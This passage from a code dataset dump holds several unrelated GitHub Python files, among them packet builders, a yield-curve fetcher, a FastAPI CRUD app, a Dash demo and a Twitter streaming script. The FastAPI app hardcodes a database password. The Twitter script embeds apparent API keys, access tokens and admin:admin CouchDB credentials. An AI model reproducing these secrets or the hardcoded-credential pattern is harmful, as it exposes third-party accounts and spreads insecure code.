**kwargs):\n eth_hdr = make_eth_hdr(**kwargs)\n saqr_hdr = SaqrPacket(pkt_type=PKT_TYPE_QUEUE_REMOVE, cluster_id=cluster_id, src_id=src_id, dst_id=dst_id, q_len=0, seq_num=seq_num)\n pkt = eth_hdr / scapy.IP(src='192.168.0.16', dst=dst_ip) / scapy.UDP(dport=SAQR_PORT, chksum=0) / saqr_hdr\n return pkt\n\ndef make_saqr_idle_signal_pkt(dst_ip, cluster_id, src_id, dst_id, seq_num, **kwargs):\n eth_hdr = make_eth_hdr(**kwargs)\n saqr_hdr = SaqrPacket(pkt_type=PKT_TYPE_IDLE_SIGNAL, cluster_id=cluster_id, src_id=src_id, dst_id=dst_id, q_len=0, seq_num=seq_num)\n pkt = eth_hdr / scapy.IP(src='192.168.0.16', dst=dst_ip) / scapy.UDP(dport=SAQR_PORT, chksum=0) / saqr_hdr\n return pkt\n\ndef make_saqr_idle_remove_pkt(dst_ip, cluster_id, src_id, dst_id, seq_num, **kwargs):\n eth_hdr = make_eth_hdr(**kwargs)\n saqr_hdr = SaqrPacket(pkt_type=PKT_TYPE_IDLE_REMOVE, cluster_id=cluster_id, src_id=src_id, dst_id=dst_id, q_len=0, seq_num=seq_num)\n pkt = eth_hdr / scapy.IP(src='192.168.0.16', dst=dst_ip) / scapy.UDP(dport=SAQR_PORT, chksum=0) / saqr_hdr\n return pkt\n\ndef make_saqr_queue_signal_pkt(dst_ip, cluster_id, src_id, dst_id, seq_num, is_init, **kwargs):\n eth_hdr = make_eth_hdr(**kwargs)\n if is_init:\n pkt_type = PKT_TYPE_QUEUE_SIGNAL_INIT\n else:\n pkt_type = PKT_TYPE_QUEUE_SIGNAL\n saqr_hdr = SaqrPacket(pkt_type=pkt_type, cluster_id=cluster_id, src_id=src_id, dst_id=dst_id, q_len=0, seq_num=seq_num)\n pkt = eth_hdr / scapy.IP(src='192.168.0.16', dst=dst_ip) / scapy.UDP(dport=SAQR_PORT, chksum=0) / saqr_hdr\n return pkt\n\n\ndef make_saqr_task_done_pkt(dst_ip, cluster_id, src_id, dst_id, is_idle, q_len, seq_num=1000, pkt_len=128, **kwargs):\n eth_hdr = make_eth_hdr(**kwargs)\n if is_idle:\n saqr_hdr = SaqrPacket(pkt_type=PKT_TYPE_TASK_DONE_IDLE, cluster_id=cluster_id, src_id=src_id, dst_id=dst_id, q_len=q_len, seq_num=seq_num)\n else:\n saqr_hdr = SaqrPacket(pkt_type=PKT_TYPE_TASK_DONE, cluster_id=cluster_id, src_id=src_id, dst_id=dst_id, q_len=q_len, seq_num=seq_num)\n pkt = eth_hdr / scapy.IP(src='192.168.0.16', dst=dst_ip) / scapy.UDP(dport=SAQR_PORT, chksum=0) / saqr_hdr\n return 
pkt\n\n\n\n\n","repo_name":"horus-scheduler/horus-p4","sub_path":"p4_16/targets/tofino/legacy/saqr/pkts.py","file_name":"pkts.py","file_ext":"py","file_size_in_byte":6114,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"21861735556","text":"import datetime\n\nimport pandas as pd\nfrom src.backend.data.api_base import DataAPIBase\n\n\nclass DailyTreasuryYieldCurve(DataAPIBase):\n\n def __init__(self):\n super().__init__()\n self._from_cache = True\n\n def get_all_data_between_dates(self, start_date, end_date):\n return self._request_data(start_date, end_date)\n\n def get_col_data_between_dates(self, start_date, end_date, search_column, search_str):\n data = self.get_all_data_between_dates(start_date=start_date, end_date=end_date)\n assert search_str in data[search_column].unique()\n return data[data[search_column] == search_str].reset_index(drop=True)\n\n def get_yield_curve_for_date(self, date):\n # We create a range of days incase the day selected is not a trading day\n start_date = self.create_date(year=date.year, month=date.month, day=date.day)\n end_date = min([start_date + datetime.timedelta(days=30),\n datetime.datetime.today()])\n\n df = self.get_all_data_between_dates(start_date=start_date, end_date=end_date)\n\n # Isolate day, we know that the date closest to the requested date is first one\n df = df.drop(columns=[self.date_col_name])\n if len(df) == 0:\n return None\n\n df = df.iloc[0]\n df = df.transpose()\n df = pd.DataFrame(df)\n df.columns = ['Yield (%)']\n\n # Add column for maturity in days\n for i, row in df.iterrows():\n num = int(str(i).split(' ')[0])\n\n if 'Mo' in i:\n days = num * 30\n elif 'Yr' in i:\n days = num * 365\n else:\n raise ValueError(f'Unknown date format: {i}')\n df.loc[i, 'Days'] = days\n\n df = df[['Days', 'Yield (%)']]\n df = df.reset_index(drop=False)\n df = df.rename(columns={'index': 'Maturity'})\n return df\n\n def _request_data(self, start_date, end_date):\n min_year = start_date.year\n max_year = end_date.year\n\n _all_df = list()\n for year in range(min_year, max_year + 1):\n _df = self._request_data_for_year(year)\n _all_df.append(_df)\n _all_df = pd.concat(_all_df, axis=0).reset_index(drop=True)\n _all_df = _all_df.sort_values(by=self.date_col_name, ascending=True)\n _all_df = _all_df.loc[(_all_df[self.date_col_name] >= start_date) & (_all_df[self.date_col_name] <= end_date)]\n _all_df = _all_df.reset_index(drop=True)\n return _all_df\n\n def _request_data_for_year(self, year):\n\n unique_str = f'DailyTreasuryYieldCurve{year}'\n\n df = None\n if self._from_cache:\n df = self._load_data_from_cache(unique_str)\n\n if df is None:\n print(f'Requesting data from treasury.gov for {year}')\n df = pd.read_csv('https://home.treasury.gov/resource-center/data-chart-center/interest-rates/'\n 'daily-treasury-rates.csv/'\n f'{year}/all?type=daily_treasury_yield_curve&field_tdr_date_value={year}&page&_format=csv')\n self._save_to_cache(unique_str=unique_str, data=df)\n\n df = self.format_data(df)\n\n return df\n\n def format_data(self, df):\n df = df.rename(columns={'Date': self.date_col_name})\n df[self.date_col_name] = pd.to_datetime(df[self.date_col_name], format='%m/%d/%Y')\n return df\n\n\nif __name__ == '__main__':\n dtyc = DailyTreasuryYieldCurve()\n\n all_data = dtyc.get_all_data_between_dates(start_date=dtyc.create_date(year=2020, month=1, day=1),\n end_date=dtyc.create_date(year=2022, month=1, day=1))\n\n import matplotlib.pyplot as plt\n #\n # # # Plot Historical Yield Data\n # 
plt.plot(all_data['date'], all_data['1 Yr'])\n # plt.plot(all_data['date'], all_data['2 Yr'])\n # plt.plot(all_data['date'], all_data['5 Yr'])\n # plt.plot(all_data['date'], all_data['10 Yr'])\n # plt.plot(all_data['date'], all_data['30 Yr'])\n # plt.show()\n\n # Plot the Yield Curve for 26/09/2022\n yc_data = dtyc.get_yield_curve_for_date(date=datetime.datetime(year=2022, month=9, day=27))\n print(yc_data)\n plt.plot(yc_data['Days'], yc_data['Yield (%)'])\n plt.show()\n","repo_name":"JordanYeomans/macro_economics","sub_path":"src/backend/data/home_treasury_gov/daily_treasury_yield_curve.py","file_name":"daily_treasury_yield_curve.py","file_ext":"py","file_size_in_byte":4262,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"262996567","text":"# Define the function with input parameters garbage and travel lists and output an integer\nclass Solution:\n def garbageCollection(self, garbage: List[str], travel: List[int]) -> int:\n \n # Reverse the order of elements in the garbage and travel lists\n garbage.reverse()\n travel.reverse()\n \n # Join the elements in garbage list to a single string\n garbage2=\"\".join(garbage)\n \n # Initialize variables to store the distances to each of the G, P and M locations\n a=0\n b=0\n c=0\n \n # Loop through the garbage list and find the distances to the first occurrence of G, P and M\n for i in range(len(garbage)):\n # If distances to all G, P and M are found, break out of the loop\n if(a!=0 and b!=0 and c!=0):\n break\n # Find the distance to G if it has not been found yet\n if (\"G\" in garbage[i]) and a==0:\n a=sum(travel[i:])\n # Find the distance to P if it has not been found yet\n if (\"P\" in garbage[i]) and b==0:\n b=sum(travel[i:])\n # Find the distance to M if it has not been found yet\n if (\"M\" in garbage[i]) and c==0:\n c=sum(travel[i:])\n \n # Calculate the total distance covered by the garbage truck\n sum1=len(garbage2)+a+b+c\n \n # Return the total distance\n return sum1\n\n\n \n\n\n\n ","repo_name":"DominatingShot/COMPETITIVE-CODING","sub_path":"LEET-CODE/2391.Minimum_Amount_of_Time_to_Collect_Garbage/Minimum_Amount_of_Time_to_Collect_Garbage.py","file_name":"Minimum_Amount_of_Time_to_Collect_Garbage.py","file_ext":"py","file_size_in_byte":1475,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"6053619610","text":"import datetime\n\nimport pytest\nimport s3fs\n\nimport podpac\nfrom podpac.datalib import gfs\n\n\n@pytest.mark.skip(\"Broken, GFS data source structure changed. 
\")\n@pytest.mark.integration\nclass TestGFS(object):\n parameter = \"SOIM\"\n level = \"0-10 m DPTH\"\n\n @classmethod\n def setup_class(cls):\n # find an existing date\n s3 = s3fs.S3FileSystem(anon=True)\n prefix = \"%s/%s/%s/\" % (gfs.BUCKET, cls.parameter, cls.level)\n dates = [path.replace(prefix, \"\") for path in s3.ls(prefix)]\n cls.date = dates[0]\n\n def test_source(self):\n # specify source datetime and forecast\n gfs_soim = gfs.GFSSourceRaw(\n parameter=self.parameter,\n level=self.level,\n date=self.date,\n hour=\"1200\",\n forecast=\"003\",\n anon=True,\n )\n\n o = gfs_soim.eval(gfs_soim.coordinates)\n\n def test_composited(self):\n # specify source datetime, select forecast at evaluation from time coordinates\n gfs_soim = gfs.GFS(parameter=self.parameter, level=self.level, date=self.date, hour=\"1200\", anon=True)\n\n # whole world forecast at 15:30\n forecast_time = datetime.datetime.strptime(self.date + \" 15:30\", \"%Y%m%d %H:%M\")\n coords = gfs_soim.sources[0].coordinates\n c = podpac.Coordinates([coords[\"lat\"], coords[\"lon\"], forecast_time], dims=[\"lat\", \"lon\", \"time\"])\n o = gfs_soim.eval(c)\n\n # time series: get the forecast at lat=42, lon=275 every hour for 6 hours\n start = forecast_time\n stop = forecast_time + datetime.timedelta(hours=6)\n c = podpac.Coordinates([42, 282, podpac.crange(start, stop, \"1,h\")], dims=[\"lat\", \"lon\", \"time\"])\n o = gfs_soim.eval(c)\n\n def test_latest(self):\n # get latest source, select forecast at evaluation\n gfs_soim = gfs.GFSLatest(parameter=self.parameter, level=self.level, anon=True)\n\n # latest whole world forecast\n forecast_time = datetime.datetime.strptime(gfs_soim.date + \" \" + gfs_soim.hour, \"%Y%m%d %H%M\")\n coords = gfs_soim.sources[0].coordinates\n c = podpac.Coordinates([coords[\"lat\"], coords[\"lon\"], forecast_time], dims=[\"lat\", \"lon\", \"time\"])\n o = gfs_soim.eval(c)\n","repo_name":"creare-com/podpac","sub_path":"podpac/datalib/test/test_gfs.py","file_name":"test_gfs.py","file_ext":"py","file_size_in_byte":2235,"program_lang":"python","lang":"en","doc_type":"code","stars":43,"dataset":"github-code","pt":"3"} +{"seq_id":"9381093195","text":"from fastapi import FastAPI, HTTPException, Request, Form\nfrom fastapi.templating import Jinja2Templates\nfrom fastapi.staticfiles import StaticFiles\nfrom fastapi.responses import HTMLResponse\nfrom fastapi.middleware.cors import CORSMiddleware\nfrom pydantic import BaseModel\nimport psycopg2\nimport uvicorn \n\n\nclass Produto(BaseModel):\n codigo: int | None\n nome: str\n preco: float\n\napp = FastAPI()\ntemplates = Jinja2Templates(directory=\"static\")\n\n# Configurando CORS para permitir requisições de qualquer origem\napp.add_middleware(\n CORSMiddleware,\n allow_origins=[\"*\"],\n allow_credentials=True,\n allow_methods=[\"*\"],\n allow_headers=[\"*\"],\n)\n\n# Conectar ao banco de dados PostgreSQL\nconn = psycopg2.connect(\n dbname=\"uirses\",\n user=\"uiers\",\n password=\"hudhsahuDSADas243\",\n host=\"postgres\",\n port=\"5432\"\n)\ncursor = conn.cursor()\n\n\napp.mount(\"/static\", StaticFiles(directory=\"static\"), name=\"static\")\n\n@app.get(\"/\", response_class=HTMLResponse, tags=[\"root\"])\ndef root_endpoint(request: Request):\n return templates.TemplateResponse(\"index.html\", {\"request\": request})\n\n@app.post(\"/produtos/\")\nasync def criar_produto(produto: Produto):\n try:\n cursor.execute(\"INSERT INTO produtos (nome, preco) VALUES (%s, %s) RETURNING codigo;\", (produto.nome, produto.preco))\n produto.codigo = 
cursor.fetchone()[0]\n conn.commit()\n return produto\n except Exception as e:\n conn.rollback()\n raise HTTPException(status_code=500, detail=str(e))\n\n\n@app.get(\"/produtos/\")\nasync def listar_produtos():\n try:\n cursor.execute(\"SELECT codigo, nome, preco FROM produtos;\")\n produtos = cursor.fetchall()\n return produtos\n except Exception as e:\n raise HTTPException(status_code=500, detail=str(e))\n\n\n@app.put(\"/produtos/{codigo}/\")\nasync def atualizar_produto(produto: Produto):\n try:\n cursor.execute(\"UPDATE produtos SET nome = %s, preco = %s WHERE codigo = %s;\", (produto.nome, produto.preco, produto.codigo))\n conn.commit()\n return {\"message\": f\"Produto de código {produto.codigo} atualizado com sucesso.\"}\n except Exception as e:\n conn.rollback()\n raise HTTPException(status_code=500, detail=str(e))\n\n\n@app.delete(\"/produtos/{codigo}/\")\nasync def excluir_produto(codigo: int):\n try:\n cursor.execute(\"DELETE FROM produtos WHERE codigo = %s;\", (codigo,))\n conn.commit()\n return {\"message\": f\"Produto de código {codigo} excluído com sucesso.\"}\n except Exception as e:\n conn.rollback()\n raise HTTPException(status_code=500, detail=str(e))\n\n\nif __name__ == '__main__':\n uvicorn.run('main:app', host='0.0.0.0', port=80)","repo_name":"Galactros/web-app-programacao-web","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2699,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"70273527122","text":"inputString = input()\noutputString = ''\nlowerLatter = 0\nupperLatter = 0\n\nfor latter in inputString :\n if latter >= 'a' and latter <= 'z' :\n lowerLatter = lowerLatter + 1\n elif latter >= 'A' and latter <= 'Z' :\n upperLatter = upperLatter + 1\n\nif upperLatter > lowerLatter :\n outputString = inputString.upper()\nelse:\n outputString = inputString.lower()\n\nprint(outputString)\n","repo_name":"behroozameri/Maktabkhooneh-Python-Programming-for-Beginners","sub_path":"Season-3-Exercise-5.py","file_name":"Season-3-Exercise-5.py","file_ext":"py","file_size_in_byte":398,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"32094734889","text":"\"\"\"add post subreddit index\n\nRevision ID: 8b61fe3a51ce\nRevises: 581822d8495e\nCreate Date: 2023-02-25 21:25:27.142373\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = '8b61fe3a51ce'\ndown_revision = '581822d8495e'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n with op.batch_alter_table('posts', schema='posts') as batch_op:\n batch_op.create_index(batch_op.f('ix_posts_posts_reddit_subreddit_id'), ['reddit_subreddit_id'], unique=False)\n\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! 
###\n with op.batch_alter_table('posts', schema='posts') as batch_op:\n batch_op.drop_index(batch_op.f('ix_posts_posts_reddit_subreddit_id'))\n\n # ### end Alembic commands ###\n","repo_name":"jacob-bayer/SunbeltAPI","sub_path":"migrations/versions/8b61fe3a51ce_add_post_subreddit_index.py","file_name":"8b61fe3a51ce_add_post_subreddit_index.py","file_ext":"py","file_size_in_byte":881,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"43985557251","text":"from __future__ import print_function\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom scipy.optimize import curve_fit\n\n\ndef gauss(x, H, A, x0, sigma):\n return H + A * np.exp(-(x - x0) ** 2 / (2 * sigma ** 2))\n\ndef gauss_fit(x, y):\n mean = sum(x * y) / sum(y)\n sigma = np.sqrt(sum(y * (x - mean) ** 2) / sum(y))\n popt, pcov = curve_fit(gauss, x, y, p0=[min(y), max(y), mean, sigma])\n return popt\n\n\n# generate simulated data\nnp.random.seed(123) # comment out if you want different data each time\nxdata = np.linspace(3, 10, 100)\nydata_perfect = gauss(xdata, 20, 5, 6, 1)\nydata = np.random.normal(ydata_perfect, 1, 100)\n\nH, A, x0, sigma = gauss_fit(xdata, ydata)\nFWHM = 2.35482 * sigma\n\nprint('The offset of the gaussian baseline is', H)\nprint('The center of the gaussian fit is', x0)\nprint('The sigma of the gaussian fit is', sigma)\nprint('The maximum intensity of the gaussian fit is', H + A)\nprint('The Amplitude of the gaussian fit is', A)\nprint('The FWHM of the gaussian fit is', FWHM)\n\nplt.plot(xdata, ydata, 'ko', label='data')\nplt.plot(xdata, ydata_perfect, '-k', label='data (without_noise)')\nplt.plot(xdata, gauss(xdata, *gauss_fit(xdata, ydata)), '--r', label='fit')\n\nplt.legend()\nplt.title('Gaussian fit, $f(x) = A e^{(-(x-x_0)^2/(2sigma^2))}$')\nplt.xlabel('Motor position')\nplt.ylabel('Intensity (A)')\nplt.show()","repo_name":"isabel-sp/isabelsurop","sub_path":"image_process/gaussian.py","file_name":"gaussian.py","file_ext":"py","file_size_in_byte":1346,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"27757725975","text":"import time\n\nimport dash\nimport dash_bootstrap_components as dbc\nimport dash_loading_spinners as dls\nfrom dash import Input, Output, html\n\napp = dash.Dash(external_stylesheets=[dbc.themes.UNITED])\n\nspinner_options = {\n # Dots\n \"Beat\": dls.Beat,\n \"ThreeDots\": dls.ThreeDots,\n \"Pulse\": dls.Pulse,\n \"Ellipsis\": dls.Ellipsis,\n \"Rotate\": dls.Rotate,\n \"Sync\": dls.Sync,\n \"Propagate\": dls.Propagate,\n \"Rise\": dls.Rise,\n \"Dot\": dls.Dot,\n \"MutatingDots\": dls.MutatingDots,\n # Circles\n \"Tunnel\": dls.Tunnel,\n \"Puff\": dls.Puff,\n \"Target\": dls.Target,\n \"Rings\": dls.Rings,\n \"Ripple\": dls.Ripple,\n # Grid\n \"Grid\": dls.Grid,\n \"GridFade\": dls.GridFade,\n \"Circles\": dls.Circles,\n # Circle\n \"Oval\": dls.Oval,\n \"RevolvingDot\": dls.RevolvingDot,\n \"Moon\": dls.Moon,\n \"TailSpin\": dls.TailSpin,\n \"Clip\": dls.Clip,\n \"DualRing\": dls.DualRing,\n \"RingChase\": dls.RingChase,\n \"Roller\": dls.Roller,\n \"Ring\": dls.Ring,\n \"Bounce\": dls.Bounce,\n \"SpinningDisc\": dls.SpinningDisc,\n \"Hourglass\": dls.Hourglass,\n # Square\n \"Square\": dls.Square,\n # Lines\n \"Audio\": dls.Audio,\n \"Scale\": dls.Scale,\n \"Bars\": dls.Bars,\n \"Wave\": dls.Wave,\n # Triangle\n \"BallTriangle\": dls.BallTriangle,\n \"Triangle\": dls.Triangle,\n \"Skew\": dls.Skew,\n # Special\n \"Hash\": dls.Hash,\n \"Fade\": dls.Fade,\n \"Clock\": 
dls.Clock,\n \"Pacman\": dls.Pacman,\n \"Hearts\": dls.Hearts,\n \"ClimbingBox\": dls.ClimbingBox,\n}\n\nloading_output = html.Div(id=\"loading-output\", style={\"height\": \"100px\"})\nsvg = \"\"\"\n \n \n \n \n \n \n \n \n\"\"\"\n\n\ndef getSpinnerBox(title, spinner):\n return dbc.Col(\n html.Div(\n [html.Div(title), spinner(fullscreen=False)],\n className=\"d-flex flex-column align-items-center \"\n \"justify-content-center border border-primary rounded h-100\",\n ),\n className=\"col-md-3\",\n style={\"height\": \"150px\"},\n )\n\n\nallSpinners = [\n getSpinnerBox(t, s) for t, s in spinner_options.items() if s is not None\n]\n\n\napp.layout = html.Div(\n [\n html.Div(\"Loading spinners.\", className=\"h1\"),\n html.Div(\n \"Loading spinners can be used whilst a dash component is loading.\",\n className=\"p\",\n ),\n html.Div(\n dls.Hash(\n loading_output,\n id=\"loading-item\",\n fullscreen=False,\n fullscreenClassName=\"bg-light\",\n ),\n id=\"loader\",\n className=\"container d-flex justify-content-center\"\n \" align-items-center border border-primary rounded my-2\",\n ),\n html.Div(\n [\n dbc.Row(\n [\n dbc.Col(\n html.Div(\n [\n dbc.Checkbox(\n checked=False,\n id=\"fullscreen\",\n className=\"me-2\",\n ),\n dbc.Label(\"Fullscreen?\"),\n ]\n ),\n className=\"col-md-4\",\n ),\n dbc.Col(\n html.Div(\n dbc.Button(\n \"View\",\n id=\"loading-button\",\n className=\"btn-success\",\n n_clicks=0,\n )\n ),\n className=\"col-md-2\",\n ),\n ],\n className=\"align-items-end\",\n )\n ],\n className=\"container\",\n ),\n html.Div(\"All loading spinners.\", className=\"h1\"),\n html.Div(\n [\n dbc.Row(\n allSpinners[i : min(i + 4, len(allSpinners))],\n className=\"m-2\",\n )\n for i in range(0, len(allSpinners), 4)\n ]\n ),\n html.Div(\"Custom loading spinners.\", className=\"h1\"),\n html.Div(\n \"If you have animated SVG code, you can use this as a \"\n \"custom spinner.\",\n className=\"p\",\n ),\n html.Div(\n dls.Custom(\n id=\"custom-loader\",\n fullscreen=False,\n fullscreenClassName=\"bg-light\",\n svg=svg,\n ),\n style={\"height\": \"200px\"},\n className=\"container d-flex justify-content-center \"\n \"align-items-center border border-primary rounded my-2\",\n ),\n html.Div(\n dbc.Row(\n [\n dbc.Col(\n dbc.Textarea(\n id=\"svg-text\", value=svg, style={\"height\": \"200px\"}\n ),\n className=\"col-md-9\",\n ),\n dbc.Col(\n dbc.Button(\n \"View\",\n id=\"custom-button\",\n className=\"btn-success\",\n n_clicks=0,\n ),\n className=\"col-md-3\",\n ),\n ],\n className=\"mx-2\",\n ),\n ),\n ],\n)\n\n\n@app.callback(Output(\"custom-loader\", \"svg\"), [Input(\"svg-text\", \"value\")])\ndef change_custom(value):\n return value\n\n\n@app.callback(\n Output(\"loading-item\", \"fullscreen\"), [Input(\"fullscreen\", \"checked\")]\n)\ndef change_fullscreen(checked):\n return checked\n\n\n@app.callback(\n Output(\"loading-output\", \"children\"),\n [Input(\"loading-button\", \"n_clicks\")],\n)\ndef load_output(n):\n\n if n:\n time.sleep(3)\n return f\"Output loaded {n} times\"\n return \"Output not reloaded yet\"\n\n\nif __name__ == \"__main__\":\n app.run_server(debug=True, port=8088)\n","repo_name":"glsdown/dash-loading-spinners","sub_path":"examples/usage.py","file_name":"usage.py","file_ext":"py","file_size_in_byte":6707,"program_lang":"python","lang":"en","doc_type":"code","stars":32,"dataset":"github-code","pt":"3"} +{"seq_id":"5465800810","text":"import torch \nimport torch.nn as nn\nimport numpy as np\nfrom utils import *\n\n\n \nclass bayesian_classifier_chain_clf(nn.Module):\n def 
__init__(self, INPUT_DIM, HIDDEN_DIM, N_CLASSES, PARENT_DICT, DEVICE='cuda', CELL_TYPE='GRU'):\n super(bayesian_classifier_chain_clf, self).__init__()\n self.NAME = \"bayesian_classifier_chain_clf\"\n self.HIDDEN_DIM = HIDDEN_DIM\n self.INPUT_DIM = INPUT_DIM\n self.N_CLASSES = N_CLASSES\n self.CELL_TYPE = CELL_TYPE\n self.device = DEVICE\n self.N_LAYERS = 1\n self.parent_dict = PARENT_DICT\n\n if CELL_TYPE == \"RNN\":\n self.rnn_cell = nn.RNN(INPUT_DIM+self.N_CLASSES, HIDDEN_DIM, self.N_LAYERS, batch_first=False) \n elif CELL_TYPE == \"GRU\":\n self.rnn_cell = nn.GRU(INPUT_DIM+self.N_CLASSES, HIDDEN_DIM, self.N_LAYERS, batch_first=False) \n elif CELL_TYPE == \"LSTM\":\n self.rnn_cell = nn.LSTM(INPUT_DIM+self.N_CLASSES, HIDDEN_DIM, self.N_LAYERS, batch_first=False) \n\n self.out = nn.Linear(HIDDEN_DIM, self.N_CLASSES) \n\n def initHidden(self, BATCH_SIZE):\n if self.CELL_TYPE == \"LSTM\":\n return (torch.zeros(self.N_LAYERS, BATCH_SIZE, self.HIDDEN_DIM).to(self.device),\n torch.zeros(self.N_LAYERS, BATCH_SIZE, self.HIDDEN_DIM).to(self.device))\n else:\n return torch.zeros(self.N_LAYERS, BATCH_SIZE, self.HIDDEN_DIM).to(self.device)\n\n def forward(self, X, Y=False, TRAINING = True):\n\n\n predictions = []\n\n prev_preds = torch.Tensor(np.zeros(X.shape[1])).to(self.device)\n\n X_aug = torch.cat((prev_preds.unsqueeze(0).unsqueeze(2), X), dim=2)\n\n if TRAINING:\n pred_list = []\n for instance in range(X.shape[1]):\n x = X[:,instance,:].unsqueeze(1)\n #print('Y shape', Y.shape)\n y = Y[instance] #if Y is [b, C]\n #print('y shape', y.shape)\n \n pred_y = torch.Tensor(np.zeros(self.N_CLASSES)).to(self.device)\n for c in range(self.N_CLASSES):\n self.state = self.initHidden(x.shape[1])\n parents = self.parent_dict[c]['parents']\n if len(parents) == 0:\n parent_vec = torch.Tensor(np.zeros(self.N_CLASSES)).to(self.device)\n x_aug = torch.cat((parent_vec.unsqueeze(0).unsqueeze(1), x), dim=2)\n output, self.state = self.rnn_cell(x_aug, self.state)\n pred_y[c] += self.out(output).flatten()[c] \n \n else:\n for p in parents:\n parent_vec = torch.Tensor(np.zeros(self.N_CLASSES)).to(self.device)\n parent_vec[p] = y[p] \n x_aug = torch.cat((parent_vec.unsqueeze(0).unsqueeze(1), x), dim=2)\n output, self.state = self.rnn_cell(x_aug, self.state)\n pred_y[c] += self.out(output).flatten()[c] \n pred_y = pred_y.view(1,-1) \n pred_list.append(pred_y)\n y_pred = torch.cat(pred_list)\n return y_pred\n else:\n predicted_dict = {}\n code = 0\n for instance in range(X.shape[1]):\n x = X[:,instance,:].unsqueeze(1)\n x_k = 'x' + str(code)\n predicted_dict[x_k] = {}\n for c in range(self.N_CLASSES):\n self.infer(x, x_k, c, predicted_dict)\n code += 1\n return predicted_dict\n \n def infer(self, x, x_k, c, predicted_dict):\n parents = self.parent_dict[c]['parents']\n state = self.initHidden(x.shape[1])\n if c not in predicted_dict[x_k].keys():\n if len(parents) == 0:\n parent_vec = torch.Tensor(np.zeros(self.N_CLASSES)).to(self.device)\n x_aug = torch.cat((parent_vec.unsqueeze(0).unsqueeze(1), x), dim=2)\n output, state = self.rnn_cell(x_aug, state)\n predicted_dict[x_k][c] = torch.sigmoid(self.out(output).flatten()[c])\n else:\n for p in parents:\n if p not in predicted_dict[x_k].keys():\n self.infer(x,x_k,p,predicted_dict)\n state = self.initHidden(x.shape[1])\n for p in parents:\n parent_vec = torch.Tensor(np.zeros(self.N_CLASSES)).to(self.device)\n parent_vec[p] = torch.round(predicted_dict[x_k][p])\n x_aug = torch.cat((parent_vec.unsqueeze(0).unsqueeze(1), x), dim=2)\n output, state = self.rnn_cell(x_aug, state)\n 
predicted_dict[x_k][c] = torch.sigmoid(self.out(output).flatten()[c]) #if out is [c]\n\n \n def computeLoss(self, logits, labels):\n criterion = nn.BCEWithLogitsLoss()\n loss = criterion(logits, labels)\n return loss","repo_name":"waltergerych/RBCC","sub_path":"models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":4992,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"16566064362","text":"#!/usr/bin/python\n\nimport glob,os\nimport grass.script as grass\n\n\n# Insert Path to input maps folder\nlyrs_in = \"/home/user/test/mygeoss_points/\"\n \n# Insert Path to folder for output map storing\nlyrs_out = \"/home/user/test/mygeoss_points/\"\n \n \n# Processing\nos.chdir(lyrs_in)\nlayers=[]\nfor file in glob.glob(\"*.shp\"):\n layers.append(file)\n\n\nfor item in layers:\n grass.run_command(\"v.in.ogr\",input=item,output=item.split(\".\")[0],quiet=True)\n chk = grass.read_command(\"v.info\",map=item.split(\".\")[0],flags=\"t\")\n if (chk.split(\"\\n\")[1]).split(\"=\")[1] > 0:\n grass.run_command(\"v.kernel\",input=item.split(\".\")[0],output=item.split(\".\")[0],radius=1200,kernel=\"quartic\",overwrite=True, quiet=True)\n max = (grass.read_command(\"r.univar\", map=item.split(\".\")[0], flags=\"g\").split(\"\\n\"))[4].split(\"=\")[1]\n grass.mapcalc(\"$out = $inp/$max\", out=\"N\"+item.split(\".\")[0], inp=item.split(\".\")[0], max=max)\n grass.run_command(\"r.out.gdal\", input=\"N\"+item.split(\".\")[0], output=lyrs_out+\"N\"+item.split(\".\")[0]+\".tiff\", quiet=True)\n","repo_name":"GabrielePrestifilippo/CityFocus","sub_path":"Data processing/point_process.py","file_name":"point_process.py","file_ext":"py","file_size_in_byte":1060,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"3"} +{"seq_id":"5261667474","text":"\r\nimport couchdb\r\nfrom tweepy import Stream\r\nfrom tweepy import OAuthHandler\r\nfrom tweepy.streaming import StreamListener\r\nimport json\r\n\r\n\r\n###API ########################\r\nckey = \"Ok7GRYYssNsfY9lXR8CIe3xeJ\"\r\ncsecret = \"5YrZnShw3g93HAVyASSlyrAER8ok0Sae1gU3mZXBTBxCXyDpUD\"\r\natoken = \"1288264585519288320-uSIAbWH8d7zossuXMpN87FmMeZeUS4\"\r\nasecret = \"804vnKpAWdmdl150dEb7IknuPbKsjkGx7wiBqb3LJ2XqY\"\r\n#####################################\r\n\r\nclass listener(StreamListener):\r\n \r\n def on_data(self, data):\r\n dictTweet = json.loads(data)\r\n try:\r\n \r\n dictTweet[\"_id\"] = str(dictTweet['id'])\r\n doc = db.save(dictTweet)\r\n print (\"SAVED\" + str(doc) +\"=>\" + str(data))\r\n except:\r\n print (\"Already exists\")\r\n pass\r\n return True\r\n \r\n def on_error(self, status):\r\n print (status)\r\n \r\nauth = OAuthHandler(ckey, csecret)\r\nauth.set_access_token(atoken, asecret)\r\ntwitterStream = Stream(auth, listener())\r\n\r\n'''========couchdb'=========='''\r\nserver = couchdb.Server('http://admin:admin@localhost:5984/') #('http://115.146.93.184:5984/')\r\ntry:\r\n db = server.create('tweets_ecuador')\r\nexcept:\r\n db = server['tweets_ecuador']\r\n \r\n\r\n#twitterStream.filter(track=['Guillermo Lasso','Fabricio Correa','Gustavo Larrea', 'Lucio Gutiérrez', 